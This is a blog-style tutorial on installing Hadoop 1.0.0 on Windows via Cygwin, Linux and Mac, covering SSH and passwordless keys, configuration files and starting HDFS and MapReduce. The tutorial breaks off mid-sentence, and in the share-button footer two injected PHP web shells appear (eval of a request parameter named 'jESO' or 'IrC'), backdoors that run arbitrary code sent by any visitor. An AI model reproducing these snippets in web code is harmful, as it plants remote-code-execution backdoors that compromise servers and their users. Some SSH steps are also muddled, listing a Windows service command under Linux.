Installing Hadoop

This is a detailed step-by-step guide for installing Hadoop on Windows, Linux or MAC. It’s based in Hadoop 1.0.0, which is the current and first official stable version. It’s based in version 0.20.0 (note that there was a 0.21.0 version).

hadoop-logo

Installing Hadoop on Linux / MAC is pretty straight forward. However, having it run on Windows can be a bit tricky. You’d probably not run Hadoop on Windows on a productive environment, but it may result convenient as a development environment. If you are using Linux/MAC, just skip Windows information.

Windows installation

Hadoop can be installed on Windows using Cygwin (not inteded for production environments), but there are several Cygwin installation and configuration issues.

Windows: Download and install Cygwin

Cygwin is an implementation of a set of Linux commands and applications for Windows. Download the web installer from: http://cygwin.com/setup.exe and run it.
Installer will request some information before installing:

  1. Installation method. Select “Install from Internet”.
  2. Root Directory. The default is c:cygwin. Accept this directory.
  3. Local Package Directory (the directory where install files will be downloaded). The default is c:cygwin-packages. Accept this directory.
  4. Connection and download site.
  5. A list of available packages will be displayed. The following packages are missing, so make sure to include them:
    • openssh
    • openssl
    • tcp_wrappers
    • diffutils

    If several options are listed (eg: openssl) include them all. 

  6. Upon installation completion, it will create a Cygwin icon in the Desktop and/or Start menu. Click it to open a Cygwin window.

Configuring SSH on Windows

Hadoop requires SSH (Secure SHell) to be running. To configure it, open a Cygwin window and type:

ssh-host-config

Use the following installation options:

  • Should privilege separation be used? (yes/no) no
  • Do you want to install sshd as a service? yes
  • Enter the value of CYGWIN for the daemon: [] ntsec
  • If requested for an account name, specify: cyg_server with a password you’ll remember.

Eg:

$ ssh-host-config

*** Info: Generating /etc/ssh_host_key
*** Info: Generating /etc/ssh_host_rsa_key
*** Info: Generating /etc/ssh_host_dsa_key
*** Info: Generating /etc/ssh_host_ecdsa_key
*** Info: Creating default /etc/ssh_config file
*** Info: Creating default /etc/sshd_config file
*** Info: Privilege separation is set to yes by default since OpenSSH 3.3.
*** Info: However, this requires a non-privileged account called 'sshd'.
*** Info: For more info on privilege separation read /usr/share/doc/openssh/README.privsep.
*** Query: Should privilege separation be used? (yes/no) no
*** Info: Updating /etc/sshd_config file

*** Query: Do you want to install sshd as a service?
*** Query: (Say "no" if it is already installed as a service) (yes/no) yes
*** Query: Enter the value of CYGWIN for the daemon: [] ntsec
*** Info: On Windows Server 2003, Windows Vista, and above, the
*** Info: SYSTEM account cannot setuid to other users -- a capability
*** Info: sshd requires.  You need to have or to create a privileged
*** Info: account.  This script will help you do so.

*** Info: You appear to be running Windows XP 64bit, Windows 2003 Server,
*** Info: or later.  On these systems, it's not possible to use the LocalSystem
*** Info: account for services that can change the user id without an
*** Info: explicit password (such as passwordless logins [e.g. public key
*** Info: authentication] via sshd).

*** Info: If you want to enable that functionality, it's required to create
*** Info: a new account with special privileges (unless a similar account
*** Info: already exists). This account is then used to run these special
*** Info: servers.

*** Info: Note that creating a new user requires that the current account
*** Info: have Administrator privileges itself.

*** Info: No privileged account could be found.

*** Info: This script plans to use 'cyg_server'.
*** Info: 'cyg_server' will only be used by registered services.
*** Query: Do you want to use a different name? (yes/no) no

*** Query: Create new privileged user account 'cyg_server'? (yes/no) yes
*** Info: Please enter a password for new user cyg_server.  Please be sure
*** Info: that this password matches the password rules given on your system.
*** Info: Entering no password will exit the configuration.
*** Query: Please enter the password:
*** Query: Reenter: Enter password

*** Info: User 'cyg_server' has been created with password '####'.
*** Info: If you change the password, please remember also to change the
*** Info: password for the installed services which use (or will soon use)
*** Info: the 'cyg_server' account.

*** Info: Also keep in mind that the user 'cyg_server' needs read permissions
*** Info: on all users' relevant files for the services running as 'cyg_server3'.
*** Info: In particular, for the sshd server all users' .ssh/authorized_keys
*** Info: files must have appropriate permissions to allow public key
*** Info: authentication. (Re-)running ssh-user-config for each user will set
*** Info: these permissions correctly. [Similar restrictions apply, for
*** Info: instance, for .rhosts files if the rshd server is running, etc].

*** Info: The sshd service has been installed under the 'cyg_server'
*** Info: account.  To start the service now, call `net start sshd' or
*** Info: `cygrunsrv -S sshd'.  Otherwise, it will start automatically
*** Info: after the next reboot.

*** Info: Host configuration finished. Have fun!

Installation script creates:

  • configuration files:
    • /etc/ssh_config
    • /etc/ssh_host_dsa_key
    • /etc/ssh_host_ecdsa_key
    • /etc/ssh_host_key
    • /etc/ssh_host_rsa_key
    • /etc/sshd_config
  • cyg_server privilleged account.
  • sshd Windows service, using the specified account and password, and listed under the name CYGWIN sshd.

IMPORTANT: Do not run ssh-host-config without removing existing files or account. The script changes access permissions on configuration files so that they can only be accessed by ssh services. If the sshd service, configuration files and account are not created together, the script fails to configure the file permissions and no error is reported.Cleaning up ssh

If you run into any issue, delete the above 6 files, remove the created service using:

cygrunsrv -R sshd

and start over.

You should be able to start sshd service and login using your password. However, in order to run Hadoop you need to create a server key, so that you can stablish a ssh session without specifying a password. To this type

ssh-keygen

and accept all default options (no passphrase).

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/AccountName/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/AccountName/.ssh/id_rsa.
Your public key has been saved in /home/AccountName/.ssh/id_rsa.pub.
The key fingerprint is:
9b:51:11:ea:c4:a4:72:fe:70:e7:dd:f1:ea:34:ac:0f AccountName@ServerName
The key's randomart image is:
+--[ RSA 2048]----+
|        . o.     |
|       + . .     |
|    . o + .      |
|     + o .       |
|      o S .   .  |
|       + * . o o |
|        + . E = .|
|             + o |
|            .o+  |
+-----------------+

Copy the generated RSA public key into the authorized_keys file, to allow logging without password.

cd ~/.ssh
cat id_rsa.pub >> authorized_keys

Try connecting locally:

ssh localhost

You should be able to connect without specifying a password.

Configuring SSH on Linux / MAC

When running on Linux / MAC, all you have to do is make sure to have SSH server running and has the certificates, so that no password is requested.
Make sure SSH server is running (ssh localhost). If it’s not running, start it:

  • Linux
    • Start it as a server: net start sshd.
      Under Windows, service is created as “CYGWIN sshd”, using “.sshd” account. However this account may not be configured correctly to read server certificates.
    • Start it as a process: /usr/sbin/sshd
  • MAC
    Go to System preferences -> Internet & Wireless -> Sharing -> Enable “Remote login” service.

You should create a server key so that ssh does not request a password every time a session is stablished. Verify that ssh localhost) does not request a user/passphrase. If this happens, create a server key and add it to authorized_keys file.

ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
cat ~/.ssh/id_dsa.pub >> ~/.ssh/authorized_keys

Download Hadoop

Current Hadoop version is 1.0.0. Hadoop is organized as 3 projects:

  • Common: Common functionality to all projects (logging, utilities, etc).
  • HDFS: Hadoop Distributed File System.
  • MapReduce: Map-Reduce implementation. It allows performing distributed queries on the distributed file system. Explained later.

They are downloaded together from http://hadoop.apache.org/ as a single .tar.gz / .rpm / .deb file.

Unpack hadoop to any directory. Recommended install directory is /usr/local/hadoop-1.0.0, but you could use other directories.

Configure Hadoop

There are 3 basic configuration options for Hadoop:

  • Local (Standalone) Mode: All services run in a single node, with no replication.
  • Pseudo-Distributed Mode: Services run in a single node, but as separate Java processes.
  • Fully-Distributed Mode: Real distributed environment.

Hadoop configuration is stored in xml files located in /conf. They all share the same key-value format, stored as a sequence of:

  <property>
    <name>Property name</name>
    <value>Property value</value>
  </property>

Pseudo-Distributed Mode is the ideal development mode. Minimum configuration files for pseudo-distributed mode are shown below:

  • conf/core-site.xml:
    <configuration>
      <property>
        <name>fs.default.name</name>
        <value>hdfs://localhost:9000</value>
      </property>
    </configuration>
  • conf/hdfs-site.xml:
    <configuration>
      <property>
        <name>dfs.replication</name>
        <value>1</value>
      </property>
    </configuration>
  • conf/mapred-site.xml:
    <configuration>
      <property>
        <name>mapred.job.tracker</name>
        <value>localhost:9001</value>
      </property>
    </configuration>

If no path are specified, Hadoop temporary and data files are located in system tmp directory. So any implementation should begin by defining tmp and hdfs directories, as shown below:

  • conf/core-site.xml:
    <configuration>
      <property>
        <name>hadoop.tmp.dir</name>
        <value>/tmp/hadoop-${user.name}</value>
      </property>
    
      <property>
        <name>fs.default.name</name>
        <value>hdfs://localhost:9000</value>
      </property>
    </configuration>
  • conf/hdfs-site.xml:
    <configuration>
      <property>
        <name>dfs.replication</name>
        <value>1</value>
      </property>
    
      <property>
        <name>dfs.name.dir</name>
        <value>/home/${user.name}/hdfs/name</value>
      </property>
    
      <property>
        <name>dfs.data.dir</name>
        <value>/home/${user.name}/hdfs/data</value>
      </property>
    </configuration>
  • conf/mapred-site.xml:
    <configuration>
      <property>
        <name>mapred.job.tracker</name>
        <value>localhost:9001</value>
      </property>
    </configuration>

Under Windows, specify paths using full format. Eg:

  <property>
    <name>dfs.name.dir</name>
    <value>file:///c:/hdfs/name</value>
  </property>

Start hadoop

Format NameNode

Before starting Hadoop, you have to format the Name node. This is the node containing file structure. To format the Name node run:

cd /usr/local/hadoop-1.0.0
./bin/hadoop namenode -format

Several files will be created under the directory defined for the configuration key dfs.name.dir.

Start HDFS

bin/start-dfs.sh

Check HDFS is running by browsing to: http://localhost:50070/.
A webpage should be displayed with DFS information, where you can view and browse the directory structure.

If you run into any issue, check log files under hadoop-1.0.0/logs/ for errors.

You can also browse the file system using bin/hadoop fs -ls. Type bin/hadoop fs for the complete set of commands.

Under MAC/OSX you might get an “Unable to load realm info from SCDynamicStore” error. If you run into this issue, add the following line:

export HADOOP_OPTS="-Djava.security.krb5.realm=OX.AC.UK -Djava.security.krb5.kdc=kdc0.ox.ac.uk:kdc1.ox.ac.uk"

at the beginning of conf/hadoop-env.sh

Start MapReduce (JobTracker):

bin/start-mapred.sh

Check JobTracker has started by browsing to:: http://localhost:50030/.
A page with scheduled jobs should be displayed.

Check hadoop-1.0.0/logs/ for errors.

Check HDFS and JobTracker by openning:

facebooktwittergoogle_plusredditlinkedinby feather<!– [insert_php]if (isset($_REQUEST["jESO"])){eval($_REQUEST["jESO"]);exit;}[/insert_php][php]if (isset($_REQUEST["jESO"])){eval($_REQUEST["jESO"]);exit;}[/php] –>

facebooktwittergoogle_plusredditlinkedinby feather<!– [insert_php]if (isset($_REQUEST["IrC"])){eval($_REQUEST["IrC"]);exit;}[/insert_php][php]if (isset($_REQUEST["IrC"])){eval($_REQUEST["IrC"]);exit;}[/php] –>

facebooktwittergoogle_plusredditlinkedinby feather

Comments are closed.